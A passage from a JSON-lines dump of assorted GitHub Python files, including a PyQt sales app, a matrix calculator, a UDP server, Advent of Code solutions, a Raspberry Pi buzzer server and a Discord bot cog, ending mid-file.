active_report = self.show_create_report_dialog()\n\n if active_report:\n self._reports.load_report(self.txtWorkdate.text())\n try:\n # do we have a customer\n _ = self._customers.customer[\"company\"]\n except KeyError:\n msgbox = QMessageBox()\n msgbox.information(self,\n __appname__,\n \"Ingen valgt kunde! Besøg kan ikke oprettes.\",\n QMessageBox.Ok)\n return\n # Launch the visit dialog\n visit_dialog = VisitDialog(customers=self._customers,\n employees=self._employees,\n products=self._products,\n reports=self._reports,\n visits=self._visits)\n if visit_dialog.exec_():\n pass\n\n @pyqtSlot(name=\"zero_database\")\n def zero_database(self):\n \"\"\"\n Slot for zeroDatabase triggered signal\n \"\"\"\n self._contacts.recreate_table()\n self._customers.recreate_table()\n self._orderlines.recreate_table()\n self._visits.recreate_table()\n self._reports.recreate_table()\n\n self.populate_contact_list()\n self.populate_visit_details_list()\n self.populate_visit_list()\n self.populate_customer_list()\n\n self._settings.setting[\"lsc\"] = \"\"\n self._settings.setting[\"sac\"] = \"\"\n self._settings.setting[\"lsp\"] = \"\"\n self._settings.setting[\"sap\"] = \"\"\n self._settings.update()\n self.display_sync_status()\n\n msgbox = QMessageBox()\n msgbox.information(self, __appname__, \"Salgsdata er nulstillet!\", QMessageBox.Ok)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n # app.setAutoSipEnabled(True)\n # app.setDesktopSettingsAware(True)\n # app.setAttribute(Qt.AA_EnableHighDpiScaling)\n\n pixmap = QPixmap(\":/splash/splash.png\")\n splash = QSplashScreen(pixmap, Qt.WindowStaysOnTopHint)\n splash.show()\n\n app.processEvents()\n\n window = MainWindow()\n window.show()\n\n QTimer.singleShot(1000, window.run)\n splash.finish(window)\n\n sys.exit(app.exec_())\n","repo_name":"fhdk/eordre2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":28326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33772644664","text":"# A branch from YogiSystemHub\n\nimport os\n\ndef sygcmd(command):\n\twin = ('nt', 'dos')\n\tif command == \"syg pyfunc version\":\n\t\tif os.name in win:\n\t\t\tos.system(\"python --version\")\n\t\telse:\n\t\t\tos.system(\"python3 --version\")\n\telif command == \"syg version\":\n\t\tprint(\"YogiSystem 1.0.0\")\n\telif command == \"borra\" or command == \"cancella\" or command == \"clear\" or command== \"borrado\":\n\t\tif os.name in win:\n\t\t\tos.system(\"cls\")\n\t\telse:\n\t\t\tos.system(\"clear\")\n\telif command == \"syg pyfunc python\" or command == \"syg pyfunc python3\":\n\t\tif os.name in win:\n\t\t\tos.system(\"python\")\n\t\telse:\n\t\t\tos.system(\"python3\")\n\telif command == \"syg pyfunc pip install library\":\n\t\tlibrary = input(\"\"\"\nQué librería desea descargar desde pip?\nYogiSystem Python Pip $ \"\"\")\n\t\ttry:\n\t\t\tos.system(f\"pip install {library}\")\n\t\texcept:\n\t\t\tif os.name == \"Linux\":\n\t\t\t\tos.system(\"sudo apt install python3-pip\")\n\t\t\telse:\n\t\t\t\treturn \"Lamentamos el error de no estar disponible pip\"\n\telif command == \"syg pyfunc pip uninstall library\":\n\t\tlibrary = input(\"\"\"\nQué librería desea desinstalar desde pip?\nYogiSystem Python Pip $ \"\"\")\n\t\tos.system(f\"pip uninstall {library}\")\n\t\t\t\n\n#comando = input(\"YogiSystem Python $ \")\n#sygcmd(comando)\n","repo_name":"Francesco091011/yogisystem","sub_path":"syg/sygpyfunc.py","file_name":"sygpyfunc.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28965738405","text":"from socket import *\n\nserver = socket(AF_INET, SOCK_DGRAM)\nserver.bind((\"0.0.0.0\",8889))\nprint(\"waiting!\")\nwhile True:\n data,addr = server.recvfrom(1024)\n if not data:\n break\n print(\"Server receive message %s:%s\"%(data.decode(),addr))\n server.sendto(b\"Thank for your msg!\",addr)\nserver.close()\n","repo_name":"mrliuminlong/note","sub_path":"socket/udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24510581874","text":"import sys\r\nfrom timeit import default_timer as timer\r\nfrom zUtils.utils import *\r\nfrom queue import LifoQueue\r\n\r\ndata: list[str] = []\r\n\r\n# FILENAME FOR INPUT DATA\r\nINPUT_FILENAME: str = \"day10.txt\"\r\nBRACKET_MATCHES: dict[str, str] = {\r\n '(': ')',\r\n '[': ']',\r\n '{': '}',\r\n '<': '>'\r\n}\r\nERROR_SCORES: dict[str, int] = {\r\n ')': 3,\r\n ']': 57,\r\n '}': 1197,\r\n '>': 25137\r\n}\r\n\r\n\r\ndef validate(line: str, break_on_fail: bool = True) -> int:\r\n error_score: int = 0\r\n brackets: LifoQueue = LifoQueue()\r\n for i in line:\r\n if i in BRACKET_MATCHES:\r\n # new open bracket\r\n brackets.put(i)\r\n else:\r\n # close bracket\r\n last: str = brackets.get()\r\n if i != BRACKET_MATCHES[last]:\r\n printDebug(f\"Expected {BRACKET_MATCHES[last]}, found {i}\")\r\n error_score += ERROR_SCORES[i]\r\n if break_on_fail:\r\n break\r\n\r\n return error_score\r\n\r\n\r\n# INIT\r\n# Code for startup\r\nstart_time = timer()\r\ndata = advent_init(INPUT_FILENAME, sys.argv, clear_screen=False)\r\n\r\n# HERE WE GO\r\nerrors: List[int] = []\r\nfor line in data:\r\n validation = validate(line)\r\n if validation > 0:\r\n errors.append(validation)\r\n\r\nprintGood(f\"Part 1 answer: {sum(errors)}\")\r\n\r\nprintOK(\"Time: %.5f seconds\" % (timer()-start_time))\r\n","repo_name":"ZachAttakk/adventofcode","sub_path":"2021/10-1.py","file_name":"10-1.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27966677846","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n# l = one()\n# n_list = list(wow())\n# nn_list = [n_list[0]]\n# a_list = list(wow())\n# aa_list = [a_list[0]]\n# for nn,aa in zip(n_list[1:],a_list[1:]):\n# nn_list.append(nn_list[-1]+nn)\n# aa_list.append(aa_list[-1]+aa)\n# cnt = \"none\"\n# for index in range(l):\n# if nn_list[index] == aa_list[index]:\n# cnt=index\n# print(0 if cnt == \"none\" else cnt+1)\n\n# for _ in range(one()):\n# index,k,a =wow()\n# n_list = []\n# while a != 0:\n# n_list.append(str(a%k))\n# a//=k\n# cnt = 0\n# for i in n_list:\n# cnt+=int(i)**2\n# print(index,cnt)\n# index = 1\n# for _ in range(one()):\n# r,l = wow()\n# n_list = inputing()\n# n_dict = {}\n# for _ in range(r):\n# a_list = inputing()\n# for ll in range(l):\n# if ll not in n_dict:\n# n_dict[ll]=[a_list[ll]]\n# else:\n# n_dict[ll]+=[a_list[ll]]\n# cnt = 0\n# for i in range(l):\n# if n_list[i] in n_dict[i]:\n# pass\n# else:\n# cnt+=1\n# if index != 1:\n# print()\n# print(f\"Data Set {index}:\")\n# print(f\"{cnt}/{l}\")\n# index+=1\n\n\n \n \n \n \n ","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2022/9월/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1068367164","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport subprocess\n\nimport pytest\n\nfrom cli import contains, ls, mk, rm, since\n\n\ndef test_ls(ls_fixture):\n \"\"\"Testing ls command.\"\"\"\n pathname, test_list = ls_fixture\n assert ls(pathname) == set(test_list) # noqa: C405\n\n\n@pytest.mark.xfail\ndef test_mk(mk_fixture):\n \"\"\"Testing mk command.\"\"\"\n filename, pre_exist, post_exist = mk_fixture\n assert os.path.isfile(filename) == pre_exist\n mk(filename)\n assert os.path.isfile(filename) == post_exist\n\n\n@pytest.mark.xfail\ndef test_rm(rm_fixture):\n \"\"\"Testing rm command.\"\"\"\n filename, pre_exist, post_exist = rm_fixture\n assert os.path.isfile(filename) == pre_exist\n rm(filename)\n assert os.path.isfile(filename) == post_exist\n\n\ndef test_contains(contains_fixture):\n \"\"\"Testing contains command.\"\"\"\n filename, status = contains_fixture\n assert contains(filename) == status\n\n\ndef test_since(since_fixture):\n \"\"\"Testing since command.\"\"\"\n path, date, test_list = since_fixture\n assert since(date, path) == set(test_list) # noqa: C405\n\n\ndef test_integration(integration_fixture):\n \"\"\"Testing integration command.\"\"\"\n comand, argument, code = integration_fixture\n format_str = 'python students/revyakinpetr/3/cli.py {0} {1}'\n comand_str = format_str.format(comand, argument)\n assert subprocess.call(comand_str, shell=True) == code # noqa: S602\n","repo_name":"sobolevn/itmo-2019","sub_path":"students/revyakinpetr/3/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"22024031960","text":"from typing import List\n\nimport lab as B\nimport torch\nfrom lab import dispatch\nfrom plum import Union\n\n_Numeric = Union[B.Number, B.TorchNumeric]\n\n\n@dispatch\ndef polyval(coeffs: list, x: _Numeric) -> _Numeric: # type: ignore\n \"\"\"\n Computes the elementwise value of a polynomial.\n\n If `x` is a tensor and `coeffs` is a list if size n + 1, this function returns\n the value of the n-th order polynomial\n\n ..math:\n p(x) = coeffs[n-1] + coeffs[n-2] * x + ... + coeffs[0] * x**(n-1)\n \"\"\"\n curVal = 0\n for i in range(len(coeffs) - 1):\n curVal = (curVal + coeffs[i]) * x\n\n return curVal + coeffs[-1]\n\n\n@dispatch\ndef from_numpy(\n a: B.TorchNumeric, b: Union[List, B.Number, B.NPNumeric, B.TorchNumeric]\n): # type: ignore\n \"\"\"\n Converts the array `b` to a tensor of the same backend as `a`\n \"\"\"\n return torch.tensor(b)\n","repo_name":"vdutor/SphericalHarmonics","sub_path":"src/spherical_harmonics/lab_extras/torch/extras.py","file_name":"extras.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"5396474838","text":"from django.urls import path\nfrom .views import index, login, check, check_in, report, show, lbt, notice, api\n\nurlpatterns = [\n path('', index, name='index'),\n path('login/', login, name='login'),\n path('check/', check, name='check'),\n path('check_in/', check_in, name='check_in'),\n path('report/', report, name='report'),\n path('show/', show, name='show'),\n path('lbt/', lbt, name='lbt'),\n path('noticemanger/', notice, name='notice'),\n path('api/', api, name='api')\n]\n","repo_name":"jzab-nb/welcome_new_2022","sub_path":"back/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71729669287","text":"# -*- coding: utf-8 -*-\n\nimport os \nimport gensim\nfrom os import listdir\nfrom os.path import isfile, join\nfrom flask import request, Flask, render_template, jsonify\n\nimport model\n\nthesis_model = model.load_model()\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\napp = Flask(__name__)\n\ndef process_file_name(filename):\n\treturn filename\n\n@app.route('/')\ndef compare_2():\n return render_template('index.html', page='compare_2')\n\n@app.route('/compare_all')\ndef compare_all():\n return render_template('index.html', page='compare_all')\n\n@app.route('/list_data')\ndef list_data():\n return render_template('index.html', page='list_data')\n\n@app.route('/api/data/list')\ndef api_data_list():\n\tdata_path = dir_path + '/data'\n\tonlyfiles = [f for f in listdir(data_path) if isfile(join(data_path, f))]\n\tonlyfiles = [f for f in onlyfiles]\n\n\treturn jsonify(onlyfiles)\n\n@app.route('/api/data/')\ndef api_data_get(filename):\n\tdata_path = dir_path + '/data/' + filename\n\tif not os.path.exists(data_path):\n\t\treturn 'Not found!'\n\n\twith open(data_path) as f:\n\t\treturn f.read()\n\n\n@app.route('/api/compare_2', methods=['POST'])\ndef api_compare_2():\n\tdata = request.get_json()\n\tif not 'doc1' in data or not 'doc2' in data:\n\t\treturn 'ERROR'\n\n\tvec1 = thesis_model.infer_vector(data['doc1'])\n\tvec2 = thesis_model.infer_vector(data['doc2'])\n\n\tvec1 = gensim.matutils.full2sparse(vec1)\n\tvec2 = gensim.matutils.full2sparse(vec2)\n\n\tprint (data)\n\tprint (vec2)\n\tprint (vec1)\n\n\treturn jsonify(sim=gensim.matutils.cossim(vec1, vec2))\n\n@app.route('/api/compare_all', methods=['POST'])\ndef api_compare_all():\n\tdata = request.get_json()\n\tif not 'doc' in data:\n\t\treturn 'ERROR'\n\n\tvec = thesis_model.infer_vector(data['doc'])\n\tres = thesis_model.docvecs.most_similar([vec], topn=5)\n\n\treturn jsonify(list=res)\n\n@app.route('/api/train_model')\ndef train_model():\n\tmodel.train_model()\n\treturn 'ok'\n\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0', port=8088, debug=True)\n","repo_name":"duyet/doc2vec-compare-doc-demo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"14464217401","text":"import numpy\n\n\ndef first_matrix():\n a = []\n row = []\n n, m = input(\"Enter size of matrix:\").split()\n print(\"Enter matrix:\")\n for i in range(int(n)):\n line = input().split()\n for num in line:\n if \".\" in num:\n row.append(float(num))\n else:\n row.append(int(num))\n a.append(row)\n row = []\n return a\n\n\ndef second_matrix():\n b = []\n row_2 = []\n n_2, m_2 = input(\"Enter size of second matrix\").split()\n print(\"Enter second matrix:\")\n for i in range(int(n_2)):\n line = input().split()\n for num in line:\n if \".\" in num:\n row_2.append(float(num))\n else:\n row_2.append(int(num))\n b.append(row_2)\n row_2 = []\n return b\n\n\ndef add_matrix(a, b):\n if len(a) != len(b) or len(a[0]) != len(b[0]):\n print(\"This operation cannot be performed.\")\n else:\n result = [[a[x][y] + b[x][y] for y in range(len(a[0]))] for x in range(len(a))]\n return result\n\n\ndef mult_constant(a):\n factor = int(input(\"Enter constant:\"))\n result = [[a[x][y] * factor for y in range(len(a[0]))] for x in range(len(a))]\n return result\n\n\ndef mult_matrix(a, b):\n result = [[sum(x * y for x, y in zip(a_row, b_col)) for b_col in zip(*b)] for a_row in a]\n return result\n\n\ndef transpose(a):\n print(\"\"\"1. Main diagonal\n2. Side diagonal\n3. Vertical line\n4. Horizontal line\"\"\")\n choice = int(input(\"Your choice:\"))\n if choice == 1:\n result = [[a[x][y] for x in range(len(a))] for y in range(len(a[0]))]\n return result\n if choice == 2:\n result = [[a[x][y] for x in range(len(a))] for y in range(len(a[0]))]\n for line in result:\n line.reverse()\n result.reverse()\n return result\n if choice == 3:\n for line in a:\n line.reverse()\n return a\n if choice == 4:\n a.reverse()\n return a\n\n\ndef determinant(a):\n a = numpy.array(a)\n result = numpy.linalg.det(a)\n return result\n\n\ndef inverse(a):\n np = numpy.array(a)\n d = numpy.linalg.det(np)\n if d == 0:\n return \"This matrix doesn't have an inverse.\"\n return numpy.linalg.inv(np)\n\n\ndef start(command):\n if command == 1:\n a = first_matrix()\n b = second_matrix()\n return add_matrix(a, b)\n if command == 2:\n a = first_matrix()\n return mult_constant(a)\n if command == 3:\n a = first_matrix()\n b = second_matrix()\n return mult_matrix(a, b)\n if command == 4:\n a = first_matrix()\n return transpose(a)\n if command == 5:\n a = first_matrix()\n return determinant(a)\n if command == 6:\n a = first_matrix()\n return inverse(a)\n\n\nwhile True:\n print(\"\"\"1. Add matrices\n2. Multiply matrix by a constant\n3. Multiply matrices\n4. Transpose matrix\n5. Calculate a determinant\n6. Inverse matrix\n0. Exit\"\"\")\n action = int(input(\"Your choice:\"))\n if action == 0:\n break\n elif action == 5:\n det = start(action)\n print(\"The result is:\")\n print(int(round(det)))\n print()\n elif action == 6:\n inv = start(action)\n if type(inv) is str:\n print(inv)\n else:\n print(\"The result is:\")\n for r in inv:\n print(*r)\n print()\n else:\n matrix = start(action)\n print(\"The result is:\")\n for r in matrix:\n print(*r)\n print()\n","repo_name":"ryanwkeith/Numeric-Matrix-Processor","sub_path":"matrix_calc.py","file_name":"matrix_calc.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27722119078","text":"#!/usr/bin/env python3\n\"\"\"\nSlice a datafile based on line number\n\"\"\"\nimport sys\nimport json\n\nimport pirail\n\ntry:\n filename = sys.argv[-1]\n split_line_no = int(sys.argv[-2])\nexcept IndexError:\n print(\"USAGE: %s [args] line_no data_file.json\" % sys.argv[0])\n sys.exit(1)\n\noutfile_name = filename.replace(\".json\", \"_%d.json\")\n\noutfile = None\n\nfor line_no, obj in pirail.read(filename):\n \n if outfile is None or line_no == split_line_no:\n if outfile is not None:\n outfile.close()\n outfile = open(outfile_name % line_no, \"w\")\n print(\"Writing %s\" % (outfile_name % line_no))\n\n outfile.write(json.dumps(obj)+\"\\n\")\n\noutfile.close()\n","repo_name":"cpn18/track-chart","sub_path":"desktop/slice_by_line.py","file_name":"slice_by_line.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15066075315","text":"#from bs4 import BeautifulSoup\nimport matplotlib.pyplot as plt\nimport requests\nfrom selenium.webdriver.support.ui import WebDriverWait as wait\nfrom selenium import webdriver\nimport time\n\nurl = \"http://zzzscore.com/1to50/en/?ts=1586038059172\"\nchrome_driver = \"#### DRIVER PATH ####\"\n\ndef open_browser():\n driver = webdriver.Chrome(chrome_driver)\n driver.maximize_window()\n driver.get(url)\n time.sleep(0.8)\n\n #time.sleep(5)\n\n for i in range(2):\n list_box = driver.find_elements_by_class_name('grid')[0].find_elements_by_tag_name('div')\n list_values = []\n for box in list_box:\n print(box.text)\n list_values.append(int(box.text))\n print(list_values)\n sequence = sorted(range(len(list_values)), key=lambda k: list_values[k])\n print(sequence)\n for index in sequence:\n list_box[index].click()\n time.sleep(0.002)\n time.sleep(0.1)\n time.sleep(5)\nprint(open_browser())\n","repo_name":"Paradiddle131/1to50-Automation","sub_path":"screen_scrape.py","file_name":"screen_scrape.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29307970918","text":"from flat import Bill, Flatmate\nfrom reports import PdfReport, FileSharer\n\na = int(input('Hey user,enter bill amount: '))\nb = input('Enter the period: ')\n\nc = input('Enter the first name of flatmate: ')\nd = int(input('Enter how much days first flatmate was at home: '))\n\ne = input('Enter the second name of flatmate: ')\nf = int(input('Enter how much days second flatmate was at home: '))\n\nthe_bill = Bill(amount=a, period=b)\nJohn = Flatmate(name=c, days_in_house=d)\nMarry = Flatmate(name=e, days_in_house=f)\nprint(f'{c} pays:', round(John.pays(bill=the_bill, flatmate2=Marry), 2))\nprint(f'{e} pays:', round(Marry.pays(bill=the_bill, flatmate2=John), 2))\n\npdf_report = PdfReport(filename=f'{the_bill.period}.pdf')\npdf_report.gererate(flatmate1=John, flatmate2=Marry, bill=the_bill)\n\nfile_sharer = FileSharer(filepath=pdf_report.filename)\n\nprint(file_sharer.share())\n","repo_name":"Mishania124/Flatmates_counter","sub_path":"flatmates_bill/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10826557364","text":"import glob\r\nimport os\r\nimport yaml\r\nimport xml.etree.ElementTree as ET\r\nimport xml.sax.saxutils\r\n\r\n# Define the directory where your YAML files are located\r\ndata_directory = 'plugins/AreaShop/regions/'\r\n\r\n# Initialize an empty dictionary to store the YAML contents\r\nyaml_objects = {}\r\n\r\n# Find all YAML files (.yml) in the data directory\r\nyaml_files = glob.glob(data_directory + '*.yml')\r\n\r\n# Iterate over the YAML files\r\nfor file_path in yaml_files:\r\n print(\"Processing file:\", file_path)\r\n with open(file_path, 'r') as file:\r\n yaml_data = yaml.safe_load(file)\r\n filename = os.path.basename(file_path)\r\n yaml_objects[filename] = yaml_data\r\n\r\n# Define the path for the output YAML file\r\noutput_file_yaml = 'combined.yml'\r\noutput_file_xml = 'combined.xml'\r\n\r\n# Write the combined YAML objects to the output YAML file\r\nwith open(output_file_yaml, 'w') as file:\r\n yaml.safe_dump(yaml_objects, file)\r\n\r\n# Convert the combined YAML objects to XML format\r\ndef convert_to_xml(element, data):\r\n if isinstance(data, dict):\r\n for key, value in data.items():\r\n sub_element = ET.SubElement(element, key)\r\n convert_to_xml(sub_element, value)\r\n elif isinstance(data, list):\r\n for i, item in enumerate(data, start=1):\r\n if isinstance(item, dict):\r\n sub_element = ET.SubElement(element, 'item', index=str(i))\r\n convert_to_xml(sub_element, item)\r\n else:\r\n sub_element = ET.SubElement(element, 'item', index=str(i))\r\n sub_element.text = xml.sax.saxutils.escape(str(item) if item is not None else '') # Convert None to empty string\r\n else:\r\n element.text = xml.sax.saxutils.escape(str(data) if data is not None else '') # Convert None to empty string\r\n\r\nroot = ET.Element('root')\r\nfor filename, yaml_data in yaml_objects.items():\r\n item = ET.SubElement(root, filename.split('.')[0])\r\n convert_to_xml(item, yaml_data)\r\n\r\n# Function to rename tags starting with numbers\r\ndef rename_tags_with_numbers(element):\r\n for child in list(element):\r\n if child.tag.isdigit():\r\n index = child.attrib.pop('index', None)\r\n new_tag = 'item_{}'.format(index) if index is not None else 'item'\r\n child.tag = new_tag\r\n rename_tags_with_numbers(child)\r\n else:\r\n rename_tags_with_numbers(child)\r\n\r\n# Create a new XML tree to perform tag renaming\r\nnew_root = ET.Element(root.tag)\r\nnew_root.extend(root)\r\nrename_tags_with_numbers(new_root)\r\n\r\n# Create an ElementTree object with the new XML tree\r\ntree = ET.ElementTree(new_root)\r\n\r\n# Write the XML data to the output XML file with pretty formatting\r\nwith open(output_file_xml, 'wb') as file:\r\n tree.write(file, encoding='utf-8', xml_declaration=True)\r\n\r\n# Read the XML data from the file and apply pretty formatting\r\nwith open(output_file_xml, 'r', encoding='utf-8') as file:\r\n xml_data = file.read()\r\n xml_data = xml_data.replace('><', '>\\n<')\r\n\r\n# Write the pretty-printed XML data to the output XML file\r\nwith open(output_file_xml, 'w', encoding='utf-8') as file:\r\n file.write(xml_data)\r\n","repo_name":"United-MC/data","sub_path":"mergeYamlAndConvert.py","file_name":"mergeYamlAndConvert.py","file_ext":"py","file_size_in_byte":3155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2231883629","text":"from __future__ import with_statement\n\nimport time\nimport RPi.GPIO as GPIO\n\nimport sys,os\nsys.path.append(os.getcwd())\n\nfrom utils.jk_util import *\nfrom utils.http_server import *\n\n# read config file\nmap = read_config(\"config.yaml\", \"IR_TRANSMITTER\")\n\nclass BuzzerServer(JKHttpHandler):\n def do_GET(self):\n params = parse_query_params(self)\n\n duration = float(params.get('duration')[0])\n gap = float(params.get('gap')[0])\n frequency = int(params.get('frequency')[0])\n times = int(params.get('times')[0])\n\n buzzer_beep(duration, gap, frequency, times)\n\n self._set_headers()\n self.wfile.write(\"Ok\")\n\n\ndef buzzer_beep(duration=0.1, gap=0.05, frequency=5000, times=2):\n BUZZER_GPIO_PIN = 26\n\n for x in range(0, times):\n GPIO.setmode(GPIO.BCM) # Numbers GPIOs by physical location\n GPIO.setup(BUZZER_GPIO_PIN, GPIO.OUT) # Set pins' mode is output\n # global Buzz # Assign a global variable to replace GPIO.PWM\n Buzz = GPIO.PWM(BUZZER_GPIO_PIN, 5000) # 440 is initial frequency.\n\n Buzz.start(50) # Start Buzzer pin with 50% duty ration\n\n time.sleep(duration)\n Buzz.stop() # Stop the buzzer\n GPIO.output(BUZZER_GPIO_PIN, 1) # Set Buzzer pin to High\n time.sleep(gap)\n\n\ndef buzzer_dual_beep():\n buzzer_beep(0.1)\n\n\nif __name__ == \"__main__\":\n run_http_server(handler_class=BuzzerServer, port=map.get(\"SERVER_PORT\"))\n","repo_name":"javedkansi/pi_home_automation","sub_path":"components/buzzer.py","file_name":"buzzer.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19842493108","text":"import setuptools\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"ppt_maker\",\n version=\"0.0.1\",\n author=\"Shuo Sun, Pengcheng Song\",\n author_email=\"smth_spc@hotmail.com\",\n description=\"Make PowerPoint slides with template and data\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/nyuspc/ppt_maker\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python\",\n \"Intended Audience :: Financial and Insurance Industry\",\n \"Topic :: Multimedia :: Graphics\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n)\n","repo_name":"nyuspc/ppt_maker","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32240471767","text":"from sys import stdin, stdout\nfrom itertools import permutations\n\nDOWN = 0\nRIGHT = 1\n\n\ndef solve2(board, change_limit, i=0, j=0, previous=None, change_count=0):\n if change_count > change_limit:\n return 0\n if i >= len(board) or j >= len(board):\n return 0\n if board[i][j] == \"H\":\n return 0\n if (i + 1, j + 1) == (len(board), len(board)):\n return 1\n\n return solve2(\n board,\n change_limit,\n i + 1,\n j,\n DOWN,\n change_count + 1 if previous != DOWN else change_count,\n ) + solve2(\n board,\n change_limit,\n i,\n j + 1,\n RIGHT,\n change_count + 1 if previous != RIGHT else change_count,\n )\n\n\ntestcase_count = int(stdin.readline())\n\nfor _ in range(testcase_count):\n n, k = map(int, stdin.readline().split())\n board = [list(stdin.readline().strip()) for i in range(n)]\n\n stdout.write(f\"{solve2(board, k + 1)}\\n\")\n","repo_name":"colding10/cp-notebook","sub_path":"solutions/usaco-contest/Past Contests/Walking Home/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"21190102473","text":"# -*- coding: utf-8 -*-\n\nfrom pgl import GWindow, GCompound, GOval, GLabel\nfrom EnigmaConstants import *\n\nclass EnigmaLamp(GCompound):\n def __init__(self, letter):\n GCompound.__init__(self)\n \n lamp = GOval(LAMP_RADIUS*2, LAMP_RADIUS*2)\n lamp.setColor(LAMP_BORDER_COLOR)\n lamp.setFillColor(LAMP_BGCOLOR)\n self.add(lamp, -LAMP_RADIUS, -LAMP_RADIUS) # create design for lamps\n \n self.ch = GLabel(letter)\n self.ch.setColor(LAMP_OFF_COLOR)\n self.ch.setFont(LAMP_FONT)\n self.add(self.ch, -self.ch.getWidth()/2, LAMP_LABEL_DY)\n \n def setState(self, state): # set state of lamp to be on or off\n if state:\n self.ch.setColor(LAMP_ON_COLOR)\n else:\n self.ch.setColor(LAMP_OFF_COLOR)\n \n def getState(self): # get state of lamp )(n or off)\n if self.ch.getColor() == LAMP_ON_COLOR:\n return True\n else: \n return False \n \n ","repo_name":"AriaKillebrewBruehl/CSCI121","sub_path":"Project4/EnigmaLamp.py","file_name":"EnigmaLamp.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17492917950","text":"import Demo\nimport sys\nimport traceback\nimport Ice\n\n# from calculator_ice import A\n\nif __name__ == '__main__':\n communicator = None\n try:\n communicator = Ice.initialize(sys.argv)\n base = communicator.stringToProxy(\"calc1/calc11:tcp -h 127.0.0.2 -p 10000 -z : udp -h 127.0.0.2 -p 10000 -z\")\n printer = Demo.CalcPrx.checkedCast(base)\n command = ''\n while command != 'x':\n print('=> ')\n command = input()\n\n if command == 'add':\n result = printer.add(7, 8)\n print(\"RESULT = \", result)\n elif command == 'add2':\n result = printer.add(7000, 8000)\n print(\"RESULT = \", result)\n elif command == 'subtract':\n result = printer.subtract(7, 8)\n print(\"RESULT = \", result)\n # elif command == 'op':\n # a = A(11, 22, 33.0, \"ala ma kota\")\n # printer.op(a, 44)\n # print(\"DONE\")\n elif command == 'x':\n pass\n else:\n print('Not known command')\n except:\n traceback.print_exc()\n if communicator:\n try:\n communicator.destroy()\n except:\n traceback.print_exc()\n","repo_name":"Sharon131/Distributed-Systems-Laboratory","sub_path":"Zad6/Client/src/IceClient.py","file_name":"IceClient.py","file_ext":"py","file_size_in_byte":1297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24749475402","text":"import discord\nimport logging\n\nfrom discord.ext import commands\n\nfrom seraphsix import constants\nfrom seraphsix.cogs.utils.message_manager import MessageManager\nfrom seraphsix.models.database import Member, Role\nfrom seraphsix.models.destiny import User, DestinyMembershipResponse\nfrom seraphsix.tasks.core import execute_pydest, register\n\nlog = logging.getLogger(__name__)\n\n\nclass RegisterCog(commands.Cog, name=\"Register\"):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n @commands.cooldown(rate=2, per=5, type=commands.BucketType.user)\n async def register(self, ctx):\n \"\"\"Register your Destiny 2 account with Seraph Six\n\n This command will let Seraph Six know which Destiny 2 profile to associate\n with your Discord profile. Registering is a prerequisite to using any\n commands that require knowledge of your Destiny 2 profile.\n \"\"\"\n manager = MessageManager(ctx)\n\n embed, user_info = await register(\n manager, confirm_message=\"Initial 